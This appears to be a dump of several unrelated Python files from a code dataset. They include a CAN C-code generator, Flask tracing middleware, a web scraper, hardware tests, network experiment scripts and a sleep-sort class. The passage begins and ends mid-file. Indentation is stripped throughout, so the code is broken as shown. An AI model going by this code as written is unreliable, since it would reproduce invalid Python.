def _format_decode_code_signal(message,
signal_name,
body_lines,
variable_lines,
conversion_lines):
signal = message.get_signal_by_name(signal_name)
signal_name = _camel_to_snake_case(signal_name)
if signal.length <= 8:
type_length = 8
elif signal.length <= 16:
type_length = 16
elif signal.length <= 32:
type_length = 32
elif signal.length <= 64:
type_length = 64
for index, shift, mask in _signal_segments(signal, True):
if signal.is_float:
fmt = ' {} |= ((uint{}_t)(src_p[{}] & 0x{:02x}) {});'
else:
fmt = ' dst_p->{} |= ((uint{}_t)(src_p[{}] & 0x{:02x}) {});'
line = fmt.format(signal_name, type_length, index, mask, shift)
body_lines.append(line)
if signal.is_float:
if signal.length == 32:
variable = ' uint32_t {} = 0;'.format(signal_name)
line = ' dst_p->{0} = itof({0});'.format(signal_name)
else:
variable = ' uint64_t {} = 0;'.format(signal_name)
line = ' dst_p->{0} = itod({0});'.format(signal_name)
variable_lines.append(variable)
conversion_lines.append(line)
elif signal.is_signed:
mask = ((1 << (type_length - signal.length)) - 1)
if mask != 0:
mask <<= signal.length
formatted = SIGN_EXTENSION_FMT.format(name=signal_name,
shift=signal.length - 1,
mask=hex(mask))
body_lines.extend(formatted.splitlines())
def _format_decode_code_level(message,
signal_names,
variable_lines):
"""Format one decode level in a signal tree.
"""
body_lines = []
conversion_lines = []
muxes_lines = []
for signal_name in signal_names:
if isinstance(signal_name, dict):
mux_lines = _format_decode_code_mux(message,
signal_name,
body_lines,
variable_lines,
conversion_lines)
if muxes_lines:
muxes_lines.append('')
muxes_lines += mux_lines
else:
_format_decode_code_signal(message,
signal_name,
body_lines,
variable_lines,
conversion_lines)
if conversion_lines:
conversion_lines += ['']
if body_lines:
if body_lines[-1] != '':
body_lines.append('')
if muxes_lines:
muxes_lines.append('')
body_lines = body_lines + muxes_lines + conversion_lines
if body_lines:
body_lines = [''] + body_lines
return body_lines
def _format_decode_code(message):
variable_lines = []
body_lines = _format_decode_code_level(message,
message.signal_tree,
variable_lines)
if variable_lines:
variable_lines += ['', '']
return '\n'.join(variable_lines), '\n'.join(body_lines)
def _generate_struct(message):
comments = []
members = []
for signal in message.signals:
comment, member = _generate_signal(signal)
if comment is not None:
comments.append(comment)
if member is not None:
members.append(member)
if not comments:
comments = [' * @param dummy Dummy signal in empty message.']
if not members:
members = [' uint8_t dummy;']
return comments, members
def _unique_choices(choices):
"""Make duplicated choice names unique by first appending its value
and then underscores until unique.
"""
items = {
value: _camel_to_snake_case(name).upper()
for value, name in choices.items()
}
names = list(items.values())
duplicated_names = [
name
for name in set(names)
if names.count(name) > 1
]
unique_choices = {
value: name
for value, name in items.items()
if names.count(name) == 1
}
for value, name in items.items():
if name in duplicated_names:
name += _canonical('_{}'.format(value))
while name in unique_choices.values():
name += '_'
unique_choices[value] = name
return unique_choices
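# For illustration (hypothetical choices dict; the exact output relies on the
# insertion order of the input dictionary):
#   _unique_choices({0: 'Off', 1: 'off', 2: 'OFF'})
#   -> {0: 'OFF_0', 1: 'OFF_1', 2: 'OFF_2'}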
def _format_choices(signal, signal_name):
choices = []
for value, name in sorted(_unique_choices(signal.choices).items()):
if signal.is_signed:
fmt = '{signal_name}_{name}_CHOICE ({value})'
else:
fmt = '{signal_name}_{name}_CHOICE ({value}u)'
choices.append(fmt.format(signal_name=signal_name.upper(),
name=name,
value=value))
return choices
def _generate_is_in_range(message):
"""Generate range checks for all signals in given message.
"""
signals = []
for signal in message.signals:
scale = signal.decimal.scale
offset = (signal.decimal.offset / scale)
minimum = signal.decimal.minimum
maximum = signal.decimal.maximum
if minimum is not None:
minimum = (minimum / scale - offset)
if maximum is not None:
maximum = (maximum / scale - offset)
type_name = _type_name(signal)
suffix = _get_type_suffix(type_name)
checks = []
if minimum is not None:
minimum_type_value = _minimum_type_value(type_name)
if (minimum_type_value is None) or (minimum > minimum_type_value):
minimum = _format_decimal(minimum, signal.is_float)
checks.append('(value >= {}{})'.format(minimum, suffix))
if maximum is not None:
maximum_type_value = _maximum_type_value(type_name)
if (maximum_type_value is None) or (maximum < maximum_type_value):
maximum = _format_decimal(maximum, signal.is_float)
checks.append('(value <= {}{})'.format(maximum, suffix))
if not checks:
checks = ['true']
elif len(checks) == 1:
checks = [checks[0][1:-1]]
checks = ' && '.join(checks)
signals.append((_camel_to_snake_case(signal.name),
type_name,
checks))
return signals
def _generate_frame_id_defines(database_name, messages):
return '\n'.join([
'#define {}_{}_FRAME_ID (0x{:02x}u)'.format(
database_name.upper(),
_camel_to_snake_case(message.name).upper(),
message.frame_id)
for message in messages
])
def _generate_choices_defines(database_name, messages):
choices_defines = []
for message in messages:
message_name = _camel_to_snake_case(message.name)
for signal in message.signals:
if signal.choices is None:
continue
signal_name = _camel_to_snake_case(signal.name)
choices = _format_choices(signal, signal_name)
signal_choices_defines = '\n'.join([
'#define {}_{}_{}'.format(database_name.upper(),
message_name.upper(),
choice)
for choice in choices
])
choices_defines.append(signal_choices_defines)
return '\n\n'.join(choices_defines)
def _generate_structs(database_name, messages):
structs = []
for message in messages:
comments, members = _generate_struct(message)
structs.append(
STRUCT_FMT.format(database_message_name=message.name,
message_name=_camel_to_snake_case(message.name),
database_name=database_name,
comments='\n'.join(comments),
members='\n'.join(members)))
return '\n'.join(structs)
def _generate_declarations(database_name, messages):
declarations = []
for message in messages:
message_name = _camel_to_snake_case(message.name)
is_in_range_declarations = []
for signal_name, type_name, _ in _generate_is_in_range(message):
is_in_range_declaration = IS_IN_RANGE_DECLARATION_FMT.format(
database_name=database_name,
message_name=message_name,
signal_name=signal_name,
type_name=type_name)
is_in_range_declarations.append(is_in_range_declaration)
declaration = DECLARATION_FMT.format(database_name=database_name,
database_message_name=message.name,
message_name=message_name)
declaration += '\n' + '\n'.join(is_in_range_declarations)
declarations.append(declaration)
return '\n'.join(declarations)
def _generate_definitions(database_name, messages):
definitions = []
for message in messages:
message_name = _camel_to_snake_case(message.name)
is_in_range_definitions = []
for signal_name, type_name, check in _generate_is_in_range(message):
if check == 'true':
unused = ' UNUSED(value);\n\n'
else:
unused = ''
is_in_range_definition = IS_IN_RANGE_DEFINITION_FMT.format(
database_name=database_name,
message_name=message_name,
signal_name=signal_name,
type_name=type_name,
unused=unused,
check=check)
is_in_range_definitions.append(is_in_range_definition)
if message.length > 0:
encode_variables, encode_body = _format_encode_code(message)
decode_variables, decode_body = _format_decode_code(message)
if encode_body:
unused = ''
else:
unused = ' UNUSED(src_p);\n\n'
definition = DEFINITION_FMT.format(database_name=database_name,
database_message_name=message.name,
message_name=message_name,
message_length=message.length,
unused=unused,
encode_variables=encode_variables,
encode_body=encode_body,
decode_variables=decode_variables,
decode_body=decode_body)
else:
definition = EMPTY_DEFINITION_FMT.format(database_name=database_name,
message_name=message_name)
definition += '\n' + '\n'.join(is_in_range_definitions)
definitions.append(definition)
return '\n'.join(definitions)
def generate(database, database_name, header_name):
"""Generate C source code from given CAN database `database`.
`database_name` is used as a prefix for all defines, data
structures and functions.
`header_name` is the file name of the C header file, which is
included by the C source file.
This function returns a tuple of the C header and source files as
strings.
"""
date = time.ctime()
messages = database.messages
include_guard = '{}_H'.format(database_name.upper())
    frame_id_defines = _generate_frame_id_defines(database_name, messages)
choices_defines = _generate_choices_defines(database_name, messages)
structs = _generate_structs(database_name, messages)
declarations = _generate_declarations(database_name, messages)
definitions = _generate_definitions(database_name, messages)
header = HEADER_FMT.format(version=__version__,
date=date,
include_guard=include_guard,
frame_id_defines=frame_id_defines,
choices_defines=choices_defines,
structs=structs,
declarations=declarations)
source = SOURCE_FMT.format(version=__version__,
date=date,
header=header_name,
definitions=definitions)
return header, source
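# Example usage (a sketch; 'example.dbc' and the 'example' prefix are
# hypothetical, and cantools.database.load_file is assumed as the loader):
#
#   import cantools
#
#   db = cantools.database.load_file('example.dbc')
#   header, source = generate(db, 'example', 'example.h')
#   with open('example.h', 'w') as fout:
#       fout.write(header)
#   with open('example.c', 'w') as fout:
#       fout.write(source)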
|
python
|
from traffic.imports.builtins import SequenceType, sub
def concat(strings: SequenceType[str], separator: str) -> str:
return "".join(s if i == 0 else separator + s for i, s in enumerate(strings))
def to_func_name(name: str):
return sub(r"\W", "_", name).lower()
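# For illustration:
#   concat(['a', 'b', 'c'], ', ')      -> 'a, b, c'
#   to_func_name('My Function-Name!')  -> 'my_function_name_'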
|
python
|
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
from aws_xray_sdk.core.models import http
from aws_xray_sdk.ext.flask.middleware import XRayMiddleware as OrigMiddleware
from flask import request
__all__ = 'XRayMiddleware',
class XRayMiddleware(OrigMiddleware):
def _before_request(self):
super(XRayMiddleware, self)._before_request()
req = request._get_current_object()
if self.in_lambda_ctx:
segment = self._recorder.current_subsegment()
else:
segment = self._recorder.current_segment()
if req.url_rule:
path = req.url_rule.rule
else:
path = req.path
url = urlparse.urljoin('//{}/'.format(segment.name), path)
segment.put_http_meta(http.URL, str(url))
segment.put_annotation(http.URL, str(req.base_url))
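# Example wiring (a sketch; assumes the global xray_recorder has been
# configured elsewhere, e.g. with a service name):
#
#   from aws_xray_sdk.core import xray_recorder
#   from flask import Flask
#
#   app = Flask(__name__)
#   XRayMiddleware(app, xray_recorder)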
|
python
|
# Python Exercise 069: Create a program that reads the age and sex of several people. For each person registered,
# the program must ask whether or not the user wants to continue. At the end, show:
# A) how many people are over 18 years old.
# B) how many men were registered.
# C) how many women are under 20 years old.
total_pessoas = total_homens = mulheres_20 = total_18 = 0
while True:
print('\n', '-='*4, 'Cadastro de Pessoas', '-='*4)
idade = int(input('Idade deste indivíduo: '))
if idade < 0:
while idade < 0:
print('Idade não pode ser menor que 0! ')
idade = int(input('Idade deste indivíduo: '))
sexo = input('Sexo desta pessoa: [M/F] ').strip().upper()[0]
while sexo not in 'MF':
print('Escolha Masculino (M) ou Feminino (F)! ')
sexo = input('Sexo desta pessoa: [M/F] ').strip().upper()[0]
total_pessoas += 1
if sexo == 'M':
total_homens += 1
if sexo == 'F' and idade < 20:
mulheres_20 += 1
if idade > 18:
total_18 += 1
continuar = input('\nDeseja continuar? [S/N] ').strip().upper()[0]
while continuar not in 'SN':
print('\nEscolha uma opção válida! (S ou N)')
continuar = input('Deseja continuar? [S/N] ').strip().upper()[0]
if continuar == 'N':
break
print(f'Cadastro encerrado.\nForam cadastradas {total_18} pessoas maiores de 18 anos, {total_homens} homens e {mulheres_20} mulheres com menos de 20 anos.')
print(f'Total de pessoas: {total_pessoas}')
|
python
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import typing # noqa F401
import torch
from torch import Tensor
def _flip_sub_unique(x: Tensor, k: int) -> Tensor:
"""Get the first k unique elements of a single-dimensional tensor, traversing the
tensor from the back.
Args:
x: A single-dimensional tensor
k: the number of elements to return
Returns:
A tensor with min(k, |x|) elements.
Example:
>>> x = torch.tensor([1, 6, 4, 3, 6, 3])
>>> y = _flip_sub_unique(x, 3) # tensor([3, 6, 4])
>>> y = _flip_sub_unique(x, 4) # tensor([3, 6, 4, 1])
>>> y = _flip_sub_unique(x, 10) # tensor([3, 6, 4, 1])
    NOTE: This should really be done in C++ to speed up the loop. Also, we would
    like to make this work for arbitrary batch shapes; I'm sure this can be sped up.
"""
n = len(x)
i = 0
out = set()
idcs = torch.empty(k, dtype=torch.long)
for j, xi in enumerate(x.flip(0).tolist()):
if xi not in out:
out.add(xi)
idcs[i] = n - 1 - j
i += 1
if len(out) >= k:
break
return x[idcs[: len(out)]]
|
python
|
from numpy import *
class Nematic:
def __init__(self, xx=0, xy=0):
self.xx=xx
self.xy=xy
def angle(self):
return 0.5*arctan2(self.xy, self.xx)
def norm(self):
return sqrt(self.xx**2 + self.xy**2)
def __str__(self):
return "Nematic(%g, %g)"%(self.xx, self.xy)
|
python
|
# this file serves as both a test suite and an illustration of how tracing
# responds to various AST node types
import re
from tracelib import macros, kite_trace, get_all_traced_ast_reprs
with kite_trace:
for i in range(5):
print i
print len([1, 2, 3, 1 + 1])
x = {1: 2}
# AugAssign
a = 0
a += 1
# FunctionDef
def foo(): return 'foo!'
foo()
# ClassDef
class A(object):
def a_b(self):
return 1
@staticmethod
def a_c():
return 2
print A().a_b()
print A.a_c()
# Delete
del x[1]
# x[1] = 3
# Print with `dest`
log = open("/tmp/hi", "w")
print >>log, "test"
# For with orelse, Continue
for i in range(3):
continue
else:
print 'orelse'
# While, Break
while True:
break
# If, Pass
if True:
print 'hi'
if False:
pass
else:
print 'hi'
if False:
pass
elif False:
pass
else:
print 'hi'
# With
with open('/tmp/hi') as f:
pass
# TryExcept, Raise
try:
raise ValueError('yo')
except: # no type, no name
pass
try: # type, no name
raise ValueError('')
except ValueError:
pass
try: # type, name
raise ValueError('hi')
except ValueError as e:
pass
try: # orelse
pass
except ValueError as e:
pass
else:
print 'reached'
try:
pass
finally:
print 'finally'
# Assert
assert True
try:
assert False, "hi"
except:
pass
# Import / ImportFrom
import collections
from collections import OrderedDict
from collections import deque as d
import collections as c
# Exec
exec "print a" in {}, {"a": 1}
# Global
foo = 1
global foo
# BoolOp
a = True and True
b = False or True
# BinOp
x = 1 + 2
x = 1 - 2
x = 1 * 2
x = '' * 10
x = 1.5 / 2
x = 2 / 1.5
# UnaryOp
x = 2
x = ~x
# Lambda
x = map(lambda x: x - 2, range(3))
# IfExp
if True:
pass
if False:
pass
else:
pass
if False:
pass
elif False:
pass
else:
pass
# Set
x = set([1, 2, 3])
# ListComp
x = [a for a in range(3) if a < 2]
# SetComp
y = [1, 3]
w = [1, 2, 3]
x = {x + 1 for x in y if True if True for z in w}
# DictComp
x = {k: v for (k, v) in [(1, 2), (3, 4)]}
# GeneratorExp
x = list(x + 1 for x in [1, 2, 3])
# Yield
def foo2():
yield 2, 3
x = [x for x in foo2()]
# Compare
x = x < 4 < 3
x = (x < 4) < 3
# Call
def foo(a, b, c=2):
return a + b + c
print foo(1, 2, 3)
print foo(1, 2)
print foo(1, 2, c=1)
print foo(*(1, 2, 3))
print foo(1, 2, **{'c': 10})
print foo(*(1, 2), **{'c': 10})
# Repr
print repr([1, 10])
# assignment context
class B(object):
def __init__(self): self.a = self.b = 10
x = B()
x.a = 5
x.b = x.a
x = {}
x[1] = 2
x, y = [1, 2]
x, y = (1, 2)
[x, y] = (1, 2)
[x, y] = [1, 2]
# list of differing lengths
for i in []:
print 'hi'
for i in [1]:
print 'hi'
for i in [1, 2]:
print 'hi'
for i in [{1: 2}]:
print 'hi'
print re.compile('.*')
print 'hi'
print 'TARGET CODE 2'
print {1: 2}[1]
y = [1, 2, 3]
z = y[1:]
z = y[:1]
z = y[1:2]
z = y[1:2:1]
print 'hi' * 10
# changing "type" over time
for i in ('string', 1):
print i
# test kite_trace on expressions rather than code blocks
kite_trace[repr([1, 1 + 1, 3])]
kite_trace[str(1)]
kite_trace[[1, 2]]
kite_trace[(2, 3, 1 + 5)]
kite_trace[int("5")]
kite_trace[re.compile('.*')]
kite_trace[{1: 2}[1]]
print '\n\n'.join(get_all_traced_ast_reprs(indent=' ', include_field_names=True))
|
python
|
import numpy as np
import mmap
import os
import glob
import re
class Uio:
"""A simple uio class"""
@staticmethod
def find_device_file(device_name):
device_file = None
r = re.compile("/sys/class/uio/(.*)/name")
for uio_device_name_file in glob.glob("/sys/class/uio/uio*/name"):
f = open(uio_device_name_file, "r")
uio_device_name = f.readline().strip()
if uio_device_name == device_name:
m = r.match(uio_device_name_file)
device_file = m.group(1)
f.close()
return device_file
def __init__(self, name, length=0x1000):
self.name = name
self.device_name = '/dev/%s' % Uio.find_device_file(self.name)
self.device_file = os.open(self.device_name, os.O_RDWR | os.O_SYNC)
self.length = length
self.memmap = mmap.mmap(self.device_file,
self.length,
mmap.MAP_SHARED,
mmap.PROT_READ | mmap.PROT_WRITE,
offset=0)
def irq_on(self):
os.write(self.device_file, bytes([1, 0, 0, 0]))
def irq_off(self):
os.write(self.device_file, bytes([0, 0, 0, 0]))
def wait_irq(self):
os.read(self.device_file, 4)
def regs(self, offset=0, length=None):
if length == None:
length = self.length
if offset+length > self.length:
raise ValueError("region range error")
return Uio.Regs(self.memmap, offset, length)
class Regs:
def __init__(self, memmap, offset, length):
self.memmap = memmap
self.offset = offset
self.length = length
self.word_array = np.frombuffer(self.memmap, np.uint32, self.length>>2, self.offset)
self.byte_array = np.frombuffer(self.memmap, np.uint8 , self.length>>0, self.offset)
def read_word(self, offset):
return int(self.word_array[offset>>2])
def read_byte(self, offset):
return int(self.byte_array[offset>>0])
def write_word(self, offset, data):
self.word_array[offset>>2] = np.uint32(data)
def write_byte(self, offset, data):
self.byte_array[offset>>0] = np.uint8(data)
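# Example usage (a sketch; "uio_example" is a hypothetical device name that
# must match an entry under /sys/class/uio/*/name, and the register offsets
# below are illustrative):
#
#   uio = Uio("uio_example")
#   regs = uio.regs()
#   regs.write_word(0x00, 0x1)
#   print(hex(regs.read_word(0x04)))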
|
python
|
# Wanderlust Wine - UK
# Tutorial from John Watson Rooney YouTube channel
import requests
from bs4 import BeautifulSoup
from requests.api import head
import pandas as pd
import re
wine_list = []
# Step 1 - Request
def request(x):
url = f'http://www.wanderlustwine.co.uk/buy-wine-online/page/{x}/'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15'}
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
return soup
# Step 2 - Parse
def parse(soup):
products = soup.find_all('li', class_= 'product')
for item in products:
name = item.find('h2', class_= 'woocommerce-loop-product__title').text
price = item.find('span', 'woocommerce-Price-amount amount').text
wine = {
'name': name,
'price': price,
}
wine_list.append(wine)
# Step 3 - Output
def output():
df = pd.DataFrame(wine_list)
print(df.head())
df.to_csv('Wanderlust-Wine.csv')
for x in range(1, 4):
print('Getting page:', x)
html = request(x)
print('Parsing...')
parse(html)
output()
print('Saved items to CSV file.')
|
python
|
import os.path
import tempfile
import maptools
import maptools.external
import pytest
@pytest.mark.skipif(not maptools.external.is_ccp4_available(), reason="requires CCP4")
def test_fit(ideal_map_filename, pdb_filename):
_, output_pdb_filename = tempfile.mkstemp()
_, log_filename = tempfile.mkstemp()
maptools.fit(
input_map_filename=ideal_map_filename,
input_pdb_filename=pdb_filename,
output_pdb_filename=output_pdb_filename,
mode="rigid_body",
resolution=8,
ncycle=2,
log_filename=log_filename,
)
assert os.path.exists(output_pdb_filename)
|
python
|
#!/usr/bin/env python3
from otl866 import at89, util
import unittest
import os
class TestCase(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
print("")
port = util.default_port()
self.verbose = os.getenv("VERBOSE", "N") == "Y"
self.tl = at89.AT89(port, verbose=self.verbose)
self.tl.led(1)
def tearDown(self):
"""Call after every test case."""
self.tl.led(0)
def test_sig(self):
sig = self.tl.sig()
print("Device: %s" % at89.sig_str(sig))
"""
def test_blank(self):
# WARNING: takes a long time, maybe 20 sec
self.tl.blank()
"""
def test_reset_vdd(self):
self.tl.reset_vdd()
def test_read(self):
buff = self.tl.read(0, 16)
assert len(buff) == 16, len(buff)
def test_read_sf(self):
buff = self.tl.read_sf(0, 16)
assert len(buff) == 16, len(buff)
def test_erase(self):
self.tl.erase()
def test_lock(self):
self.tl.lock(2)
#self.tl.lock(3)
#self.tl.lock(4)
if __name__ == "__main__":
unittest.main() # run all tests
|
python
|
##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
from Products.MailHost import MailHost
from Products.MailHost import SendMailTag # noqa
def initialize(context):
context.registerClass(
MailHost.MailHost,
permission='Add MailHost objects',
constructors=(MailHost.manage_addMailHostForm,
MailHost.manage_addMailHost),
icon='www/MailHost_icon.gif',
)
|
python
|
# batch running of experiments
import os
import getpass
import argparse
from utils import *
from runmm2 import Simulation
def CleanState ():
os.system('sudo killall python2 receiver sender mm-link mm-delay >/dev/null 2>&1 ')
# os.system('sudo ../ccp-kernel/ccp_kernel_unload')
# os.system('sudo ../ccp-kernel/ccp_kernel_load ipc=0')
os.system('sudo sysctl -w net.ipv4.ip_forward=1 >/dev/null 2>&1')
os.system('sleep 5')
def RunCCP ():
CleanState ()
os.system('sudo nohup python2 ../ccp_bicdctcp/python/bic_dctcp_centroids.py 10000000 -P exp -A 0.5 >./nohup_vatic.log 2>&1 &')
os.system('sleep 5')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
megroup = parser.add_mutually_exclusive_group()
parser.add_argument('--savedir', help='Directory to store outputs', default='results')
megroup.add_argument('--ttr', '-t', type=positive_int, metavar='DURATION_SEC',
help='Duration to run the experiment (seconds)', default=30)
megroup.add_argument('--n-blocks', '-n', type=positive_int, metavar='NUM_BLOCKS',
help='Number of blocks to send')
megroup.add_argument('--trace-file', '-f', dest='filepath',
help='Trace file from which to generate traffic for sender')
parser.add_argument('--blksize', '-b', type=int,
help='Size of a block (multiples of KiB)',
default=Simulation.BLKSIZE_DEFAULT)
parser.add_argument('--cc-algo', '-C', choices=('cubic', 'reno', 'bbr', 'ccp', 'ledbat', 'verus', 'pcc'), help='CC algo to use',
default='bbr')
# parser.add_argument('--mm-delay', type=unsigned_int,
# help='Delay for mahimahi delay shell (mm-delay)')
parser.add_argument('--log', '-l', action='store_true',
help='Log packets at the sender and receiver',
default=False)
parser.add_argument('--skip-seconds', type=unsigned_int,
help='Skip initial seconds before computing performance (default: 0)',
default=0)
parser.add_argument('--verbose', '-v', action='count',
help='Show verbose output',
default=0)
args = parser.parse_args()
prettyprint_args(args)
port = 9999
# trace_list = ['Building_a_new', 'Building_b_new', 'Building_c_new', 'InHM_a_new', 'InHM_b_new', 'InHM_c_new']
# maxbw_list = [, 1000, 700, 1015, 1015, 1030]# Megabits/sec
trace_list = ['LOW_10-HIGH_100']
maxbw_list = [200]# Megabits/sec
mmdelay_list = [5]
nrep = 1
for trace, maxbw in zip(trace_list, maxbw_list):
#trace += '_new'
print(os.linesep + '**** Trace: {}, Max BW: {} Mbps ****'.format(trace, maxbw) + os.linesep)
# exit(-1)
for delay in mmdelay_list:
bdp = (maxbw * delay) * (1e3 / 8)
bdpfactor_list = [None] #[None,1,2,4]
for bdpfactor in bdpfactor_list:
if bdpfactor is None:
qsize=None
print('#### mm-delay DELAY = {} ms, buffer size = Infinite ####'.format(delay) + os.linesep)
else:
qsize = bdpfactor * bdp
qsize_nice, unit_nice = get_bytes_nice(qsize, kibi=False)
print('#### mm-delay DELAY = {} ms, buffer size = {}*BDP = {} {} ####'.format(delay, bdpfactor, qsize_nice, unit_nice) + os.linesep)
sim = Simulation(trace, port, args.ttr, args.n_blocks, args.filepath, args.blksize, args.cc_algo, qsize, delay)
for i in range(1, nrep+1):
#sim.run(root_passwd, args.savedir, args.log, args.skip_seconds, args.verbose, suffix=str(i))
try:
RunCCP ()
# print ('Running !!!')
# sim.run(args.savedir+"_{:02d}".format(i), args.log, args.skip_seconds, args.verbose)
sim.run(args.savedir, args.log, args.skip_seconds, args.verbose)
except:
print('Something failed in scenario {}... continue'.format(trace))
                # Please wait for 5 mins
|
python
|
from file_utilities import readCSVFile
from PlotterLine import PlotterLine
solution = readCSVFile("output.csv")
a_liq_plotter = PlotterLine("Position", "Volume Fraction")
a_liq_plotter.addSet(solution["x"], solution["a_liq"], "$\\alpha_\ell$", color=4, linetype=2)
a_liq_plotter.save("volume_fraction.png")
r_liq_plotter = PlotterLine("Position", "Density [kg/m$^3$]")
r_liq_plotter.addSet(solution["x"], solution["r_liq"], "$\\rho_\ell$", color=4, linetype=2)
r_liq_plotter.save("density_liquid.png")
r_vap_plotter = PlotterLine("Position", "Density [kg/m$^3$]")
r_vap_plotter.addSet(solution["x"], solution["r_vap"], "$\\rho_v$", color=1, linetype=2)
r_vap_plotter.save("density_vapor.png")
u_liq_plotter = PlotterLine("Position", "Velocity [m/s]")
u_liq_plotter.addSet(solution["x"], solution["u_liq"], "$u_\ell$", color=4, linetype=2)
u_liq_plotter.save("velocity_liquid.png")
u_vap_plotter = PlotterLine("Position", "Velocity [m/s]")
u_vap_plotter.addSet(solution["x"], solution["u_vap"], "$u_v$", color=1, linetype=2)
u_vap_plotter.save("velocity_vapor.png")
p_liq_plotter = PlotterLine("Position", "Pressure [m/s]")
p_liq_plotter.addSet(solution["x"], solution["p_liq"], "$p_\ell$", color=4, linetype=2)
p_liq_plotter.save("pressure_liquid.png")
p_vap_plotter = PlotterLine("Position", "Pressure [m/s]")
p_vap_plotter.addSet(solution["x"], solution["p_vap"], "$p_v$", color=1, linetype=2)
p_vap_plotter.save("pressure_vapor.png")
|
python
|
"""
Benchmarks for array expressions.
"""
import numpy as np
# @jit(nopython=True)
def sum(a, b):
return a + b
# @jit(nopython=True)
def sq_diff(a, b):
return (a - b) * (a + b)
# @jit(nopython=True)
def rel_diff(a, b):
return (a - b) / (a + b)
# @jit(nopython=True)
def square(a, b):
# Note this is currently slower than `a ** 2 + b`, due to how LLVM
# seems to lower the power intrinsic. It's still faster than the naive
# lowering as `exp(2 * log(a))`, though
return a ** 2
# @jit(nopython=True)
def cube(a, b):
return a ** 3
def setup():
ArrayExpressions.setupClass()
class ArrayExpressions:
n = 100000
dtypes = ('float32', 'float64')
@classmethod
def setupClass(cls):
cls.samples = {}
random = np.random.RandomState(0)
for dtype in cls.dtypes:
arrays = [random.uniform(1.0, 2.0, size=cls.n).astype(dtype)
for i in range(2)]
cls.samples[dtype] = arrays
@classmethod
def _binary_func(cls, func, dtype, fname):
def f(self):
f = getattr(self, func)
f(*self.samples[dtype])
f.__name__ = fname
return f
@classmethod
def generate_benchmarks(cls):
for dtype in cls.dtypes:
for func in (sum, sq_diff, rel_diff, square, cube):
fname = 'time_%s_%s' % (func.__name__, dtype)
bench_func = cls._binary_func(func.__name__, dtype, fname)
setattr(cls, fname, bench_func)
def setup(self):
from numba import jit
jitter = jit(nopython=True)
self.sum = jitter(sum)
self.sq_diff = jitter(sq_diff)
self.rel_diff = jitter(rel_diff)
self.square = jitter(square)
self.cube = jitter(cube)
ArrayExpressions.generate_benchmarks()
|
python
|
"""
Example usages:
python py/pdf_to_img.py -f data/test_pdfs/00026_04_fda-K071597_test_data.pdf -p 4 -o .
python py/pdf_to_img.py -f data/test_pdfs/00026_04_fda-K071597_test_data.pdf -p 4-9 -o tmp
python py/pdf_to_img.py -f data/test_pdfs/00026_04_fda-K071597_test_data.pdf -p 1,2,4-9 -o tmp
Pages can be specified 1,2,3 and/or 10-20. The out directory must exist
beforehand (e.g. mkdir tmp)
Note that, for page input, pages start with 1 (not zero)
"""
import argparse
import fitz
def get_pagelist(pages: str):
""" Pages is a string that could equal:
"1,2,3"
"3-4",
"14-4" (invalid),
"1,5-10,14"
"""
segments = pages.split(',')
pagelist = []
for s in segments:
try:
pagelist.append(int(s))
except ValueError:
if '-' in s:
lo, hi = [int(v) for v in s.split('-')]
assert hi > lo, f'Invalid page range {lo}-{hi}'
for p in range(lo, hi+1):
pagelist.append(p)
else:
                raise ValueError('pages input not valid')
return sorted(pagelist)
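# For example (illustrative): get_pagelist("1,5-7,3") returns [1, 3, 5, 6, 7]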
def main(filename: str, pages: str, outpath: str):
doc = fitz.open(filename)
pagelist = get_pagelist(pages)
for p in pagelist:
pix = doc.get_page_pixmap(p-1)
pix.save(f'{outpath}/{p}.png')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'-f',
'--filename',
help='PDF filename to create thumbnails of',
required=True,
)
parser.add_argument(
'-p',
'--pages',
help='Pages to create thumbnails of (e.g. "1,2,3" or "3,5-10")',
required=True,
)
parser.add_argument(
'-o',
'--outpath',
help='path where to save resulting images',
required=True,
)
args = parser.parse_args()
main(filename=args.filename, pages=args.pages, outpath=args.outpath)
|
python
|
import util
import os
def run():
util.process_usgs_source(
base_path=os.path.realpath(__file__),
url="http://pubs.usgs.gov/of/1998/of98-354/sfs_data.tar.gz",
uncompress_e00=True,
e00_path="sfs-geol.e00",
srs="+proj=lcc +lat_1=37.066667 +lat_2=38.433333 +lat_0=36.5 "
"+lon_0=-120.5 +x_0=609601.21920 +y_0=-6 +datum=NAD27 +units=m "
"+no_defs",
metadata_csv_path=os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"units.csv"
)
)
|
python
|
class SleepSort(object):
"""
    Sort a list of positive numbers using multi-threading:
    each thread sleeps for its integer value and then
    appends that integer to the result collection.
    Because threads wake up in order of their values,
    the result collection ends up sorted.
    eg: [3, 1, 5, 4, 2]
    for each integer, a new thread is spawned that waits
    for that many seconds and then appends the value to
    the result collection, so the result is sorted.
output: [1, 2, 3, 4, 5]
"""
def __init__(self, arr):
import time
self.inp_arr = arr
self.res = []
self.time = time
self.process()
def __repr__(self):
return ", ".join(map(str, self.res))
def add_ele_in_res(self, val):
"""
Method for adding value to result list
after delay of input value.
"""
self.time.sleep(val)
self.res.append(val)
def process(self):
"""
Sorting based on threading each value of input list.
Logic is based on partition algo of quick sort.
"""
from threading import Thread
pivot_ele = self.inp_arr[0]
part1_arr = []
part2_arr = []
for ele in self.inp_arr:
if ele < pivot_ele:
part1_arr.append(ele)
elif ele > pivot_ele:
part2_arr.append(ele)
threads = []
for ele in part1_arr:
th = Thread(target=self.add_ele_in_res, args=(ele,))
threads.append(th)
th.start()
